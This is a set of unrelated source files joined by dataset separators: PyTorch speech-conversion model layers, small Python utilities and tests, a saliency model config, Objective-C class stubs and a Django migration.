    if Np==None:
        Nf=Np
    elif type(Np) is list:
        Nf=list(zip(Np,Np))
    else:
        Nf=(Np,Np)
    basis=spinful_fermion_basis_general(N_2d, make_basis=False,
                                        Nf=Nf,
                                        kxblock=(T_x,0),kyblock=(T_y,0),
                                        pxblock=(P_x,0),pyblock=(P_y,0),
                                        )
    basis_op=spinful_fermion_basis_general(N_2d, make_basis=True,
                                           Nf=Nf,
                                           kxblock=(T_x,0),kyblock=(T_y,0),
                                           pxblock=(P_x,0),pyblock=(P_y,0),
                                           )
    compare(static_list_spfs,basis,basis_op)
    print('passed spinful fermios')
|
StarcoderdataPython
|
9697800
|
# Prompt for a sex designation and re-ask until it is 'M' or 'F'.
s = str(input('Qual é o seu sexo? [M/F] ')).strip().upper()[0] # [0] keeps only the first letter
while s not in 'FM':
    s = str(input('Sexo inválido! Digite novamente: [M/F] ')).strip().upper()[0]
print('Sexo {} registrado com sucesso!'.format(s))
|
StarcoderdataPython
|
5029368
|
<filename>fine-tune/model/layers.py<gh_stars>100-1000
import torch
from torch.autograd import Variable
from torch import nn
from torch.nn import functional as F
from .basic_layers import sort_batch, ConvNorm, LinearNorm, Attention, tile
from .utils import get_mask_from_lengths
from .beam import Beam, GNMTGlobalScorer
class SpeakerClassifier(nn.Module):
    """n-layer 1-D CNN with two projection heads.

    forward() returns the scalar logits from projection_to_A; the
    per-speaker projection head is kept for checkpoint compatibility.
    """

    def __init__(self, hparams):
        super(SpeakerClassifier, self).__init__()
        convolutions = []
        for i in range(hparams.SC_n_convolutions):
            # First layer maps the encoder embedding into the hidden size;
            # every subsequent layer stays at the hidden size. Fixed: the
            # original if/elif only covered the first and last layers, so any
            # middle layer (SC_n_convolutions >= 3) reused a stale in_dim and
            # would fail at runtime with a channel mismatch.
            if i == 0:
                in_dim = hparams.encoder_embedding_dim
            else:
                in_dim = hparams.SC_hidden_dim
            out_dim = hparams.SC_hidden_dim
            conv_layer = nn.Sequential(
                ConvNorm(in_dim,
                         out_dim,
                         kernel_size=hparams.SC_kernel_size, stride=1,
                         padding=int((hparams.SC_kernel_size - 1) / 2),
                         dilation=1, w_init_gain='leaky_relu',
                         param=0.2),
                nn.BatchNorm1d(out_dim),
                nn.LeakyReLU(0.2))
            convolutions.append(conv_layer)
        self.convolutions = nn.ModuleList(convolutions)
        # Per-speaker logits head (not used by forward()) and the scalar
        # head that forward() actually applies.
        self.projection = LinearNorm(hparams.SC_hidden_dim, hparams.pretrain_n_speakers)
        self.projection_to_A = LinearNorm(hparams.SC_hidden_dim, 1, bias=False)

    def forward(self, x):
        """x: [B, T, dim] -> scalar logits per frame."""
        # Conv1d expects [B, dim, T]
        hidden = x.transpose(1, 2)
        for conv in self.convolutions:
            hidden = conv(hidden)
        # back to [B, T, dim]
        hidden = hidden.transpose(1, 2)
        logits = self.projection_to_A(hidden)
        return logits
class SpeakerEncoder(nn.Module):
    """2-layer bidirectional LSTM speaker encoder with global mean pooling.

    Produces L2-normalized speaker embeddings plus speaker-ID logits for
    the pre-training classification objective.
    """

    def __init__(self, hparams):
        super(SpeakerEncoder, self).__init__()
        self.lstm = nn.LSTM(hparams.n_mel_channels, int(hparams.speaker_encoder_hidden_dim / 2),
                            num_layers=2, batch_first=True, bidirectional=True, dropout=hparams.speaker_encoder_dropout)
        self.projection1 = LinearNorm(hparams.speaker_encoder_hidden_dim,
                                      hparams.speaker_embedding_dim,
                                      w_init_gain='tanh')
        self.projection2 = LinearNorm(hparams.speaker_embedding_dim,
                                      hparams.pretrain_n_speakers)

    def forward(self, x, input_lengths):
        '''
        x [batch_size, mel_bins, T]

        return
        logits [batch_size, n_speakers]
        embeddings [batch_size, embedding_dim]
        '''
        x = x.transpose(1, 2)
        x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths)
        x = nn.utils.rnn.pack_padded_sequence(
            x_sorted, sorted_lengths.cpu().numpy(), batch_first=True)
        self.lstm.flatten_parameters()
        outputs, _ = self.lstm(x)
        outputs, _ = nn.utils.rnn.pad_packed_sequence(
            outputs, batch_first=True)
        # mean pooling over valid timesteps -> [batch_size, hidden_dim]
        outputs = torch.sum(outputs, dim=1) / sorted_lengths.unsqueeze(1).float()
        # torch.tanh replaces the deprecated nn.functional.tanh
        outputs = torch.tanh(self.projection1(outputs))
        outputs = outputs[initial_index]  # undo the length sort
        # L2 normalizing to obtain unit-length embeddings
        embeddings = outputs / torch.norm(outputs, dim=1, keepdim=True)
        logits = self.projection2(outputs)
        return logits, embeddings

    def inference(self, x):
        """Single-utterance path: no length sorting or packing."""
        x = x.transpose(1, 2)
        self.lstm.flatten_parameters()
        outputs, _ = self.lstm(x)
        # mean pooling over all timesteps (no padding at inference time)
        outputs = torch.sum(outputs, dim=1) / float(outputs.size(1))
        outputs = torch.tanh(self.projection1(outputs))
        embeddings = outputs / torch.norm(outputs, dim=1, keepdim=True)
        logits = self.projection2(outputs)
        pid = torch.argmax(logits, dim=1)
        return pid, embeddings
class MergeNet(nn.Module):
    """Single-layer bidirectional LSTM over merged encoder features."""

    def __init__(self, hparams):
        super(MergeNet, self).__init__()
        half_dim = int(hparams.encoder_embedding_dim / 2)
        self.lstm = nn.LSTM(hparams.encoder_embedding_dim, half_dim,
                            num_layers=1, batch_first=True, bidirectional=True)

    def forward(self, x, input_lengths):
        """x: [B, T, dim] -> [B, T, dim], honoring per-sample lengths."""
        # Sort by length so the batch can be packed, run the LSTM, then
        # restore the original batch order.
        sorted_x, sorted_lengths, restore_index = sort_batch(x, input_lengths)
        packed = nn.utils.rnn.pack_padded_sequence(
            sorted_x, sorted_lengths.cpu().numpy(), batch_first=True)
        self.lstm.flatten_parameters()
        packed_out, _ = self.lstm(packed)
        padded_out, _ = nn.utils.rnn.pad_packed_sequence(
            packed_out, batch_first=True)
        return padded_out[restore_index]

    def inference(self, x):
        """Length-free path for single-utterance inference."""
        self.lstm.flatten_parameters()
        hidden, _ = self.lstm(x)
        return hidden
class AudioEncoder(nn.Module):
    '''
    - Simple 2 layer bidirectional LSTM

    The first LSTM runs frame-by-frame; its outputs are then grouped into
    chunks of n_frames_per_step_encoder frames and fed to the second LSTM,
    reducing the time resolution by that factor.
    '''
    def __init__(self, hparams):
        super(AudioEncoder, self).__init__()
        # Optionally the speaker embedding is concatenated to every mel frame.
        if hparams.spemb_input:
            input_dim = hparams.n_mel_channels + hparams.speaker_embedding_dim
        else:
            input_dim = hparams.n_mel_channels
        self.lstm1 = nn.LSTM(input_dim,
                             int(hparams.audio_encoder_hidden_dim / 2),
                             num_layers=1, batch_first=True, bidirectional=True)
        # lstm2 consumes n_frames_per_step concatenated lstm1 outputs per step.
        self.lstm2 = nn.LSTM(hparams.audio_encoder_hidden_dim*hparams.n_frames_per_step_encoder,
                             int(hparams.audio_encoder_hidden_dim / 2),
                             num_layers=1, batch_first=True, bidirectional=True)
        self.concat_hidden_dim = hparams.audio_encoder_hidden_dim*hparams.n_frames_per_step_encoder
        self.n_frames_per_step = hparams.n_frames_per_step_encoder
    def forward(self, x, input_lengths):
        '''
        x [batch_size, mel_bins, T]

        return [batch_size, T, channels]
        '''
        x = x.transpose(1, 2)
        x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths)
        x_packed = nn.utils.rnn.pack_padded_sequence(
            x_sorted, sorted_lengths.cpu().numpy(), batch_first=True)
        self.lstm1.flatten_parameters()
        outputs, _ = self.lstm1(x_packed)
        outputs, _ = nn.utils.rnn.pad_packed_sequence(
            outputs, batch_first=True, total_length=x.size(1)) # use total_length make sure the recovered sequence length not changed
        # Group every n_frames_per_step consecutive frames into one step.
        # NOTE(review): this assumes T is divisible by n_frames_per_step -
        # verify padding guarantees upstream.
        outputs = outputs.reshape(x.size(0), -1, self.concat_hidden_dim)
        output_lengths = torch.ceil(sorted_lengths.float() / self.n_frames_per_step).long()
        outputs = nn.utils.rnn.pack_padded_sequence(
            outputs, output_lengths.cpu().numpy() , batch_first=True)
        self.lstm2.flatten_parameters()
        outputs, _ = self.lstm2(outputs)
        outputs, _ = nn.utils.rnn.pad_packed_sequence(
            outputs, batch_first=True)
        # Restore original (pre-sort) batch order for outputs and lengths.
        return outputs[initial_index], output_lengths[initial_index]
    def inference(self, x):
        # Single-utterance path: no sorting/packing, batch size fixed to 1.
        x = x.transpose(1, 2)
        self.lstm1.flatten_parameters()
        outputs, _ = self.lstm1(x)
        outputs = outputs.reshape(1, -1, self.concat_hidden_dim)
        self.lstm2.flatten_parameters()
        outputs, _ = self.lstm2(outputs)
        return outputs
class AudioSeq2seq(nn.Module):
'''
- Simple 2 layer bidirectional LSTM
'''
def __init__(self, hparams):
super(AudioSeq2seq, self).__init__()
self.encoder = AudioEncoder(hparams)
self.decoder_rnn_dim = hparams.encoder_embedding_dim
self.attention_layer = Attention(self.decoder_rnn_dim, hparams.audio_encoder_hidden_dim,
hparams.AE_attention_dim, hparams.AE_attention_location_n_filters,
hparams.AE_attention_location_kernel_size)
self.decoder_rnn = nn.LSTMCell(hparams.symbols_embedding_dim + hparams.audio_encoder_hidden_dim,
self.decoder_rnn_dim)
def _proj(activation):
if activation is not None:
return nn.Sequential(LinearNorm(self.decoder_rnn_dim+hparams.audio_encoder_hidden_dim,
hparams.encoder_embedding_dim,
w_init_gain=hparams.hidden_activation),
activation)
else:
return LinearNorm(self.decoder_rnn_dim+hparams.audio_encoder_hidden_dim,
hparams.encoder_embedding_dim,
w_init_gain=hparams.hidden_activation)
if hparams.hidden_activation == 'relu':
self.project_to_hidden = _proj(nn.ReLU())
elif hparams.hidden_activation == 'tanh':
self.project_to_hidden = _proj(nn.Tanh())
elif hparams.hidden_activation == 'linear':
self.project_to_hidden = _proj(None)
else:
print('Must be relu, tanh or linear.')
assert False
self.project_to_n_symbols= LinearNorm(hparams.encoder_embedding_dim,
hparams.n_symbols + 1) # plus the <eos>
self.eos = hparams.n_symbols
self.activation = hparams.hidden_activation
self.max_len = 100
def initialize_decoder_states(self, memory, mask):
B = memory.size(0)
MAX_TIME = memory.size(1)
self.decoder_hidden = Variable(memory.data.new(
B, self.decoder_rnn_dim).zero_())
self.decoder_cell = Variable(memory.data.new(
B, self.decoder_rnn_dim).zero_())
self.attention_weigths = Variable(memory.data.new(
B, MAX_TIME).zero_())
self.attention_weigths_cum = Variable(memory.data.new(
B, MAX_TIME).zero_())
self.attention_context = Variable(memory.data.new(
B, self.decoder_rnn_dim).zero_())
self.memory = memory
self.processed_memory = self.attention_layer.memory_layer(memory)
self.mask = mask
def map_states(self, fn):
'''
mapping the decoder states using fn
'''
self.decoder_hidden = fn(self.decoder_hidden, 0)
self.decoder_cell = fn(self.decoder_cell, 0)
self.attention_weigths = fn(self.attention_weigths, 0)
self.attention_weigths_cum = fn(self.attention_weigths_cum, 0)
self.attention_context = fn(self.attention_context, 0)
def parse_decoder_outputs(self, hidden, logit, alignments):
    """Stack per-step decoder outputs and move the batch dimension first.

    Each argument is a list of per-timestep tensors shaped [B, ...]; the
    returned tensors are shaped [B, T, ...].  ``hidden`` and ``logit`` are
    additionally made contiguous.
    """
    stacked_alignments = torch.stack(alignments).transpose(0, 1)
    # [T_out + 1, B, n_symbols] -> [B, T_out + 1, n_symbols]
    stacked_logit = torch.stack(logit).transpose(0, 1).contiguous()
    stacked_hidden = torch.stack(hidden).transpose(0, 1).contiguous()
    return stacked_hidden, stacked_logit, stacked_alignments
def decode(self, decoder_input):
    """Run a single decoder step, updating the attention/LSTM state.

    Args:
        decoder_input: embedding of the previous output symbol, [B, embedding_dim].
    Returns:
        (hidden, logit, attention_weigths) for this step.
    """
    # LSTM cell input: previous-symbol embedding + current attention context.
    cell_input = torch.cat((decoder_input, self.attention_context), -1)
    self.decoder_hidden, self.decoder_cell = self.decoder_rnn(
        cell_input,
        (self.decoder_hidden,
         self.decoder_cell))
    # Location-sensitive attention consumes both the current and the
    # cumulative attention weights.
    attention_weigths_cat = torch.cat(
        (self.attention_weigths.unsqueeze(1),
         self.attention_weigths_cum.unsqueeze(1)), dim=1)
    self.attention_context, self.attention_weigths = self.attention_layer(
        self.decoder_hidden,
        self.memory,
        self.processed_memory,
        attention_weigths_cat,
        self.mask)
    self.attention_weigths_cum += self.attention_weigths
    hidden_and_context = torch.cat((self.decoder_hidden, self.attention_context), -1)
    hidden = self.project_to_hidden(hidden_and_context)
    # dropout to increasing g
    logit = self.project_to_n_symbols(F.dropout(hidden, 0.5, self.training))
    return hidden, logit, self.attention_weigths
def forward(self, mel, mel_lengths, decoder_inputs, start_embedding):
    '''
    Teacher-forced decoding over a batch.

    decoder_inputs: [B, channel, T]
    start_embedding [B, channel]
    return
    hidden_outputs [B, T+1, channel]
    logits_outputs [B, T+1, n_symbols]
    alignments [B, T+1, max_time]
    '''
    memory, memory_lengths = self.encoder(mel, mel_lengths)
    decoder_inputs = decoder_inputs.permute(2, 0, 1)  # -> [T, B, channel]
    # Prepend the start symbol so the decoder predicts T+1 steps.
    decoder_inputs = torch.cat((start_embedding.unsqueeze(0), decoder_inputs), dim=0)
    self.initialize_decoder_states(memory,
                                   mask=~get_mask_from_lengths(memory_lengths))
    hidden_outputs, logit_outputs, alignments = [], [], []
    # Teacher forcing: the ground-truth embedding is fed at every step.
    while len(hidden_outputs) < decoder_inputs.size(0):
        decoder_input = decoder_inputs[len(hidden_outputs)]
        hidden, logit, attention_weights = self.decode(decoder_input)
        hidden_outputs += [hidden]
        logit_outputs += [logit]
        alignments += [attention_weights]
    # Stack the per-step lists into batch-first tensors.
    hidden_outputs, logit_outputs, alignments = \
        self.parse_decoder_outputs(
            hidden_outputs, logit_outputs, alignments)
    return hidden_outputs, logit_outputs, alignments
'''
use beam search ?
'''
def inference_greed(self, x, start_embedding, embedding_table):
    '''
    decoding the phone sequence using greed algorithm

    Args:
        x: input features, [1, mel_bins, T]
        start_embedding: [1, embedding_dim]
        embedding_table: nn.Embedding used to embed the previous prediction
    Returns:
        (hidden_outputs, phone_ids, alignments) stacked along time with the
        batch dimension first, as produced by parse_decoder_outputs.
    '''
    decoder_input = start_embedding
    memory = self.encoder.inference(x)
    self.initialize_decoder_states(memory, mask=None)
    hidden_outputs, alignments, phone_ids = [], [], []
    while True:
        hidden, logit, attention_weights = self.decode(decoder_input)
        hidden_outputs += [hidden]
        alignments += [attention_weights]
        phone_id = torch.argmax(logit, dim=1)
        phone_ids += [phone_id]
        # if reaches the <eos>
        if phone_id.squeeze().item() == self.eos:
            break
        # BUGFIX: the warning used to execute on every non-terminal
        # iteration; it belongs only in the length-budget branch.
        if len(hidden_outputs) == self.max_len:
            print('Warning! The decoded text reaches the maximum lengths.')
            break
        # embedding the phone_id and feed it back as the next input
        decoder_input = embedding_table(phone_id)  # -> [1, embedding_dim]
    hidden_outputs, phone_ids, alignments = \
        self.parse_decoder_outputs(hidden_outputs, phone_ids, alignments)
    return hidden_outputs, phone_ids, alignments
def inference_beam(self, x, start_embedding, embedding_table,
                   beam_width=20,):
    """Beam-search decoding of a phone sequence from audio features.

    Args:
        x: input features, [1, mel_bins, T].
        start_embedding: embedding of the start symbol, [1, embedding_dim].
        embedding_table: nn.Embedding used to embed beam candidates.
        beam_width: number of hypotheses kept per step.
    Returns:
        (hidden, phone_ids, attention) of the single best hypothesis, each
        with a leading batch dimension of 1.
    """
    # Replicate the encoder memory once per beam hypothesis.
    memory = self.encoder.inference(x).expand(beam_width, -1, -1)
    MAX_LEN = 100
    n_best = 5
    self.initialize_decoder_states(memory, mask=None)
    decoder_input = tile(start_embedding, beam_width)
    beam = Beam(beam_width, 0, self.eos, self.eos,
                n_best=n_best, cuda=True, global_scorer=GNMTGlobalScorer())
    hidden_outputs, alignments, phone_ids = [], [], []  # NOTE(review): unused in this method
    for step in range(MAX_LEN):
        if beam.done():
            break
        hidden, logit, attention_weights = self.decode(decoder_input)
        logit = F.log_softmax(logit, dim=1)
        beam.advance(logit, attention_weights, hidden)
        # Reorder decoder states to follow the surviving hypotheses.
        select_indices = beam.get_current_origin()
        self.map_states(lambda state, dim: state.index_select(dim, select_indices))
        decoder_input = embedding_table(beam.get_current_state())
    scores, ks = beam.sort_finished(minimum=n_best)
    hyps, attn, hiddens = [], [], []
    for i, (times, k) in enumerate(ks[:n_best]):
        hyp, att, hid = beam.get_hyp(times, k)
        hyps.append(hyp)
        attn.append(att)
        hiddens.append(hid)
    # Only the top-scoring hypothesis is returned, re-batched.
    return hiddens[0].unsqueeze(0), hyps[0].unsqueeze(0), attn[0].unsqueeze(0)
class TextEncoder(nn.Module):
    """Encoder module:
    - Three 1-d convolution banks
    - Bidirectional LSTM
    """
    def __init__(self, hparams):
        super(TextEncoder, self).__init__()
        convolutions = []
        for _ in range(hparams.encoder_n_convolutions):
            # Same-padded conv keeps the time dimension unchanged.
            conv_layer = nn.Sequential(
                ConvNorm(hparams.encoder_embedding_dim,
                         hparams.encoder_embedding_dim,
                         kernel_size=hparams.encoder_kernel_size, stride=1,
                         padding=int((hparams.encoder_kernel_size - 1) / 2),
                         dilation=1, w_init_gain='relu'),
                nn.BatchNorm1d(hparams.encoder_embedding_dim))
            convolutions.append(conv_layer)
        self.convolutions = nn.ModuleList(convolutions)
        # Half-width hidden state per direction, so the concatenated
        # bi-LSTM output keeps encoder_embedding_dim channels.
        self.lstm = nn.LSTM(hparams.encoder_embedding_dim,
                            int(hparams.encoder_embedding_dim / 2), 1,
                            batch_first=True, bidirectional=True)
        self.dropout = hparams.text_encoder_dropout

        # Local factory for the output projection: linear layer plus an
        # optional activation, fusing the bi-directional information.
        def _proj(activation):
            if activation is not None:
                return nn.Sequential(LinearNorm(hparams.encoder_embedding_dim,
                                                hparams.encoder_embedding_dim,
                                                w_init_gain=hparams.hidden_activation),
                                     activation)
            else:
                return LinearNorm(hparams.encoder_embedding_dim,
                                  hparams.encoder_embedding_dim,
                                  w_init_gain=hparams.hidden_activation)

        if hparams.hidden_activation == 'relu':
            self.projection = _proj(nn.ReLU())
        elif hparams.hidden_activation == 'tanh':
            self.projection = _proj(nn.Tanh())
        elif hparams.hidden_activation == 'linear':
            self.projection = _proj(None)
        else:
            print('Must be relu, tanh or linear.')
            assert False
        #self.projection = nn.LinearNorm(hparams.encoder_embedding_dim,
        #                                hparams.encoder_embedding_dim,
        #                                w_init_gain='relu') # fusing bi-directional info

    def forward(self, x, input_lengths):
        '''
        x: [batch_size, channel, T]
        return [batch_size, T, channel]
        '''
        for conv in self.convolutions:
            x = F.dropout(F.relu(conv(x)), self.dropout, self.training)
        # -> [batch_size, T, channel]
        x = x.transpose(1, 2)
        # Sort by length for pack_padded_sequence; order is restored below.
        x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths)
        # pytorch tensor are not reversible, hence the conversion
        #input_lengths = input_lengths.cpu().numpy()
        sorted_lengths = sorted_lengths.cpu().numpy()
        x = nn.utils.rnn.pack_padded_sequence(
            x_sorted, sorted_lengths, batch_first=True)
        self.lstm.flatten_parameters()
        outputs, _ = self.lstm(x)
        outputs, _ = nn.utils.rnn.pad_packed_sequence(
            outputs, batch_first=True)
        outputs = self.projection(outputs)
        # Undo the length-sorting so outputs align with the input batch order.
        return outputs[initial_index]

    def inference(self, x):
        """Single-utterance path: no sorting/packing needed."""
        for conv in self.convolutions:
            x = F.dropout(F.relu(conv(x)), self.dropout, self.training)
        x = x.transpose(1, 2)
        self.lstm.flatten_parameters()
        outputs, _ = self.lstm(x)
        outputs = self.projection(outputs)
        return outputs
class PostNet(nn.Module):
    """Postnet
    - Five 1-d convolution with 512 channels and kernel size 5

    Residual refinement applied to the decoder's mel output; optionally
    projects mel channels up to linear-spectrogram channels.
    """
    def __init__(self, hparams):
        super(PostNet, self).__init__()
        self.convolutions = nn.ModuleList()
        # First conv: mel channels -> postnet channels.
        self.convolutions.append(
            nn.Sequential(
                ConvNorm(hparams.n_mel_channels, hparams.postnet_dim,
                         kernel_size=hparams.postnet_kernel_size, stride=1,
                         padding=int((hparams.postnet_kernel_size - 1) / 2),
                         dilation=1, w_init_gain='tanh'),
                nn.BatchNorm1d(hparams.postnet_dim))
        )
        # Middle convs keep postnet_dim channels.
        for i in range(1, hparams.postnet_n_convolutions - 1):
            self.convolutions.append(
                nn.Sequential(
                    ConvNorm(hparams.postnet_dim,
                             hparams.postnet_dim,
                             kernel_size=hparams.postnet_kernel_size, stride=1,
                             padding=int((hparams.postnet_kernel_size - 1) / 2),
                             dilation=1, w_init_gain='tanh'),
                    nn.BatchNorm1d(hparams.postnet_dim))
            )
        if hparams.predict_spectrogram:
            # The residual connection must match the spectrogram channel count.
            out_dim = hparams.n_spc_channels
            self.projection = LinearNorm(hparams.n_mel_channels, hparams.n_spc_channels, bias=False)
        else:
            out_dim = hparams.n_mel_channels
        # Last conv uses a linear activation (no tanh).
        self.convolutions.append(
            nn.Sequential(
                ConvNorm(hparams.postnet_dim, out_dim,
                         kernel_size=hparams.postnet_kernel_size, stride=1,
                         padding=int((hparams.postnet_kernel_size - 1) / 2),
                         dilation=1, w_init_gain='linear'),
                nn.BatchNorm1d(out_dim))
        )
        self.dropout = hparams.postnet_dropout
        self.predict_spectrogram = hparams.predict_spectrogram

    def forward(self, input):
        # input [B, mel_bins, T]; output has the same layout, refined.
        x = input
        for i in range(len(self.convolutions) - 1):
            x = F.dropout(torch.tanh(self.convolutions[i](x)), self.dropout, self.training)
        x = F.dropout(self.convolutions[-1](x), self.dropout, self.training)
        if self.predict_spectrogram:
            # Project the mel input to spectrogram channels for the residual sum.
            o = x + self.projection(input.transpose(1,2)).transpose(1,2)
        else:
            o = x + input
        return o
|
StarcoderdataPython
|
12818784
|
#!/usr/bin/env python
"""Compare two files of floats line by line.

Exits with status 1 if any pair differs by a relative amount greater than
1e-4 (relative to the first file's value), else 0.
"""
import sys

f1 = open(sys.argv[1])
f2 = open(sys.argv[2])
res = 0
# zip() stops at the shorter file, matching the original behavior.
for l1, l2 in zip(f1, f2):
    v1 = float(l1.strip())
    v2 = float(l2.strip())
    # NOTE(review): assumes v1 is never 0 — division would raise; confirm
    # against the data these files contain.
    rel_diff = abs(v1 - v2) / abs(v1)
    if rel_diff > 10 ** -4:
        # BUGFIX: was a Python 2 print statement, a syntax error on Python 3.
        print("Difference: {} vs {}".format(v1, v2))
        res = 1
sys.exit(res)
|
StarcoderdataPython
|
11344288
|
<gh_stars>0
from timemachines.skaters.dlm.dlmunivariate import dlm_univariate_a, dlm_univariate_r3
from timemachines.skatertools.evaluation.evaluators import hospital_mean_square_error
def test_dlm_auto_univariate():
    """Smoke-test the DLM univariate skaters on the hospital MSE benchmark."""
    for skater, extra in ((dlm_univariate_a, {}), (dlm_univariate_r3, {'r': 0.53})):
        print(hospital_mean_square_error(f=skater, k=3, n=150, n_burn=44, **extra))


if __name__ == '__main__':
    test_dlm_auto_univariate()
|
StarcoderdataPython
|
3285222
|
<filename>saliency/Saliency_other_models/models/SAM_RESNET/config.py
#########################################################################
# MODEL PARAMETERS														#
#########################################################################
# version (0 for SAM-VGG and 1 for SAM-ResNet)
version = 1
# batch size
b_s = 1
# number of rows of input images
shape_r = 240
# number of cols of input images
shape_c = 320
# number of rows of downsampled maps
shape_r_gt = 30
# number of cols of downsampled maps
shape_c_gt = 40
# number of rows of model outputs
shape_r_out = 480
# number of cols of model outputs
shape_c_out = 640
# final upsampling factor
upsampling_factor = 16
# number of epochs
nb_epoch = 10
# number of timestep
nb_timestep = 4
# number of learned priors (Gaussians)
nb_gaussian = 16
#########################################################################
# TRAINING SETTINGS										            	#
#########################################################################
# NOTE: all *_path values below are placeholders and must be set to real
# dataset locations before training.
# path of training images
imgs_train_path = '/path/to/training/images/'
# path of training maps
maps_train_path = '/path/to/training/maps/'
# path of training fixation maps
fixs_train_path = '/path/to/training/fixation/maps/'
# number of training images
nb_imgs_train = 10000
# path of validation images
imgs_val_path = '/path/to/validation/images/'
# path of validation maps
maps_val_path = '/path/to/validation/maps/'
# path of validation fixation maps
fixs_val_path = '/path/to/validation/fixation/maps/'
# number of validation images
nb_imgs_val = 5000
StarcoderdataPython
|
1767827
|
def find_bucket_key(s3_path):
    """Split an s3 path of the form ``bucket/key`` into its two parts.

    Returns a ``(bucket, key)`` tuple; the key is the empty string when
    the path contains no ``/``.
    """
    # str.partition splits on the first '/' only, so nested keys survive.
    bucket, _, s3_key = s3_path.partition("/")
    return bucket, s3_key


def split_s3_bucket_key(s3_path):
    """Split an s3 path into bucket and key prefix.

    Handles an optional leading ``s3://`` scheme.
    :return: Tuple of ('bucketname', 'keyname')
    """
    scheme = "s3://"
    if s3_path.startswith(scheme):
        s3_path = s3_path[len(scheme):]
    return find_bucket_key(s3_path)
|
StarcoderdataPython
|
5059767
|
'''
Classes from the 'AGXMetalA10' framework.

Stub bindings: each name resolves to the corresponding Objective-C class
via rubicon-objc when available, or to None otherwise.
'''
try:
    from rubicon.objc import ObjCClass
except ValueError:
    # NOTE(review): importing a missing module normally raises ImportError,
    # not ValueError — confirm which exception rubicon raises in the target
    # environment before changing this.
    def ObjCClass(name):
        return None


def _Class(name):
    # Resolve an Objective-C class by name; None when it cannot be found.
    try:
        return ObjCClass(name)
    except NameError:
        return None


AGXA10FamilyIndirectRenderCommandEncoder = _Class('AGXA10FamilyIndirectRenderCommandEncoder')
AGXA10FamilyComputeOrFragmentOrTileProgram = _Class('AGXA10FamilyComputeOrFragmentOrTileProgram')
AGXA10FamilyComputeProgram = _Class('AGXA10FamilyComputeProgram')
AGXA10FamilyFragmentProgram = _Class('AGXA10FamilyFragmentProgram')
AGXA10FamilyVertexProgram = _Class('AGXA10FamilyVertexProgram')
AGXA10FamilyWarpFunction = _Class('AGXA10FamilyWarpFunction')
AGXA10FamilyResourceGroup = _Class('AGXA10FamilyResourceGroup')
AGXMTLCounterSampleBuffer = _Class('AGXMTLCounterSampleBuffer')
AGXA10FamilyIndirectComputeCommandEncoder = _Class('AGXA10FamilyIndirectComputeCommandEncoder')
AGXTextureLayout = _Class('AGXTextureLayout')
AGXA10FamilyDepthStencilState = _Class('AGXA10FamilyDepthStencilState')
AGXA10FamilyRenderPipeline = _Class('AGXA10FamilyRenderPipeline')
AGXA10FamilyComputePipeline = _Class('AGXA10FamilyComputePipeline')
AGXA10FamilySampler = _Class('AGXA10FamilySampler')
AGXA10FamilyIndirectRenderCommand = _Class('AGXA10FamilyIndirectRenderCommand')
AGXA10FamilyFunctionHandle = _Class('AGXA10FamilyFunctionHandle')
AGXA10FamilyRasterizationRateMap = _Class('AGXA10FamilyRasterizationRateMap')
AGXA10FamilyIndirectArgumentBufferLayout = _Class('AGXA10FamilyIndirectArgumentBufferLayout')
AGXA10FamilyIndirectComputeCommand = _Class('AGXA10FamilyIndirectComputeCommand')
AGXPrincipalDevice = _Class('AGXPrincipalDevice')
AGXA10FamilySparseHeap = _Class('AGXA10FamilySparseHeap')
AGXA10FamilyHeap = _Class('AGXA10FamilyHeap')
AGXA10FamilyCommandQueue = _Class('AGXA10FamilyCommandQueue')
AGXA10FamilyThreadedRenderPass = _Class('AGXA10FamilyThreadedRenderPass')
AGXA10FamilyDynamicLibrary = _Class('AGXA10FamilyDynamicLibrary')
AGXA10FamilyBinaryArchive = _Class('AGXA10FamilyBinaryArchive')
AGXA10FamilyIndirectArgumentEncoder = _Class('AGXA10FamilyIndirectArgumentEncoder')
AGXA10FamilyCommandBuffer = _Class('AGXA10FamilyCommandBuffer')
AGXA10FamilyResourceStateContext = _Class('AGXA10FamilyResourceStateContext')
AGXA10FamilyRenderContext = _Class('AGXA10FamilyRenderContext')
AGXA10FamilySampledRenderContext = _Class('AGXA10FamilySampledRenderContext')
AGXA10FamilyComputeContext = _Class('AGXA10FamilyComputeContext')
AGXA10FamilySampledComputeContext = _Class('AGXA10FamilySampledComputeContext')
AGXA10FamilyBlitContext = _Class('AGXA10FamilyBlitContext')
AGXA10FamilyDebugContext = _Class('AGXA10FamilyDebugContext')
AGXTexture = _Class('AGXTexture')
AGXA10FamilyTexture = _Class('AGXA10FamilyTexture')
AGXA10FamilyIndirectCommandBuffer = _Class('AGXA10FamilyIndirectCommandBuffer')
AGXBuffer = _Class('AGXBuffer')
AGXA10FamilyVisibleFunctionTable = _Class('AGXA10FamilyVisibleFunctionTable')
AGXA10FamilyBuffer = _Class('AGXA10FamilyBuffer')
AGXA10FamilyDevice = _Class('AGXA10FamilyDevice')
AGXA10XDevice = _Class('AGXA10XDevice')
AGXA10Device = _Class('AGXA10Device')
StarcoderdataPython
|
9623295
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the parsers app: aliment and category tables."""

    dependencies = [
    ]

    operations = [
        # Nutritional values per aliment, stored as fixed-point decimals.
        migrations.CreateModel(
            name='OnedenAliment',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=250)),
                ('calories', models.DecimalField(max_digits=7, decimal_places=2)),
                ('proteins', models.DecimalField(max_digits=7, decimal_places=2)),
                ('fats', models.DecimalField(max_digits=7, decimal_places=2)),
                ('carbohydrates', models.DecimalField(max_digits=7, decimal_places=2)),
                ('fibres', models.DecimalField(max_digits=7, decimal_places=2)),
                ('unit_quantity', models.DecimalField(max_digits=7, decimal_places=2)),
                ('additional', models.TextField()),
            ],
        ),
        migrations.CreateModel(
            name='OnedenCategory',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=100)),
            ],
        ),
        # The FK is added after both models exist.
        migrations.AddField(
            model_name='onedenaliment',
            name='category',
            field=models.ForeignKey(to='parsers.OnedenCategory'),
        ),
        # An aliment name is unique within its category.
        migrations.AlterUniqueTogether(
            name='onedenaliment',
            unique_together=set([('category', 'name')]),
        ),
    ]
|
